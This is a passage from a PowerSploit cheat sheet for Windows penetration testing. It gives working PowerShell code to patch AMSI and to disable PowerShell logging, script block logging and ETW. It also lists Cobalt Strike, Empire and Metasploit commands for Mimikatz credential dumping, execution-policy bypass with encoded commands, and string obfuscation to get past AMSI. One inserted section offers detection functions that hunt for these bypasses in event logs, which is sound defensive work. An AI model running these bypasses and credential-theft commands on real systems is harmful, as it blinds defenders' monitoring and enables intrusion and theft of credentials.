[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

PowerShell Logging Bypass

# Disable PowerShell logging
$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static')
$GPO.SetValue($null, @{})

# Disable script block logging
$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings()
$settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

ETW Bypass

# Disable ETW
$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $Provider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0)

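Each of the three bypasses above depends on a setting that a defender controls and on telemetry that, when enabled, records the bypass attempt itself: script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) captures the script text before it runs, so the AMSI patch, the cachedGroupPolicySettings trick and the PSEtwLogProvider edit all appear in the log at least once. The following is an added example, not part of the original cheat sheet or of PowerSploit: it reads the PowerShell logging policy from the registry, counts registered AMSI providers, and searches 4104 events for the identifiers used in the snippets above. Function names Get-PowerShellLoggingPosture and Find-BypassScriptBlock and the marker list are this example's own.

```powershell
# Added example (not from PowerSploit): verify the telemetry the bypasses above try to disable,
# and hunt script block logs for those bypasses.

function Get-PowerShellLoggingPosture {
    # Policy values written by Group Policy; an absent value means "not configured" (off).
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $read = { param($sub, $name)
        $v = Get-ItemProperty -Path "$base\$sub" -Name $name -ErrorAction SilentlyContinue
        [bool]($v.$name -eq 1) }
    [pscustomobject]@{
        ScriptBlockLogging = & $read 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        ModuleLogging      = & $read 'ModuleLogging'      'EnableModuleLogging'
        Transcription      = & $read 'Transcription'      'EnableTranscripting'
        # AMSI providers registered on this host; Microsoft Defender registers one by default.
        AmsiProviders      = @(Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue).Count
    }
}

function Find-BypassScriptBlock {
    # Searches 4104 script block events for the identifiers that appear in the AMSI, logging and
    # ETW bypass snippets in this cheat sheet. Obfuscation can split these strings, so treat hits
    # as a starting point, not a complete detection.
    param([int]$Hours = 24)
    $markers = 'AmsiScanBuffer', 'AmsiInitialize', 'amsi.dll', 'VirtualProtect',
               'cachedGroupPolicySettings', 'EnableScriptBlockLogging', 'PSEtwLogProvider', 'm_enabled'
    $pattern = ($markers | ForEach-Object { [regex]::Escape($_) }) -join '|'
    $filter  = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value   # ScriptBlockText is the third property of a 4104 event
        $hits = [regex]::Matches($text, $pattern, 'IgnoreCase') | ForEach-Object { $_.Value } | Sort-Object -Unique
        if ($hits) {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                ProcessId = $_.ProcessId
                Markers   = ($hits -join ',')
                Snippet   = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Usage:
#   Get-PowerShellLoggingPosture
#   Find-BypassScriptBlock -Hours 48 | Format-Table Time, ProcessId, Markers -AutoSize
```

If Get-PowerShellLoggingPosture reports ScriptBlockLogging as false, enable it through Group Policy (Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging) and forward the Operational log off the host, so that a later in-session bypass cannot erase what was already recorded.
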
Integration Examples

Cobalt Strike Integration

# PowerView integration with Cobalt Strike
beacon> powershell-import /path/to/PowerView.ps1
beacon> powershell Get-DomainUser -AdminCount
beacon> powershell Find-LocalAdminAccess

# PowerUp integration
beacon> powershell-import /path/to/PowerUp.ps1
beacon> powershell Invoke-AllChecks

# Mimikatz integration
beacon> powershell Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

Empire Integration

# Use PowerSploit modules in Empire
(Empire: agents) > usemodule powershell/situational_awareness/network/powerview/get_domain_user
(Empire: agents) > usemodule powershell/privesc/powerup/allchecks
(Empire: agents) > usemodule powershell/credentials/mimikatz/logonpasswords

Metasploit Integration

# Use PowerSploit with Metasploit
meterpreter > load powershell
meterpreter > powershell_import /path/to/PowerView.ps1
meterpreter > powershell_execute "Get-DomainUser -AdminCount"

# Post-exploitation modules
use post/windows/gather/enum_domain
use post/windows/escalate/getsystem
use post/windows/gather/credentials/credential_collector

Troubleshooting

Execution Policy Issues

# Check current execution policy
Get-ExecutionPolicy

# Set execution policy
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

# Bypass for a single command
powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1"

# Use encoded commands
$command = "Import-Module .\PowerSploit.psd1"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommand

AMSI Detection

# Test AMSI detection
'Invoke-Mimikatz'  # Should trigger AMSI

# Obfuscate strings
$cmd = 'Inv' + 'oke-Mim' + 'ikatz'
Invoke-Expression $cmd

# Use variables
$a = 'Invoke-'
$b = 'Mimikatz'
Invoke-Expression ($a + $b)

Module Import Issues

# Force import
Import-Module .\PowerSploit.psd1 -Force

# Import with full path
Import-Module "C:\Tools\PowerSploit\PowerSploit.psd1"

# Check module path
$env:PSModulePath

# Add to module path
$env:PSModulePath += ";C:\Tools\PowerSploit"

Network Connectivity Issues

# Test network connectivity
Test-NetConnection -ComputerName "target" -Port 445

# Check firewall
Get-NetFirewallRule | Where-Object {$_.Enabled -eq "True"}

# Use alternative ports
Get-DomainController -Server "dc.domain.com:389"

Resources


This cheat sheet provides a comprehensive reference for using PowerSploit for Windows penetration testing and post-exploitation. Always ensure you have proper authorization before using this tool in any environment.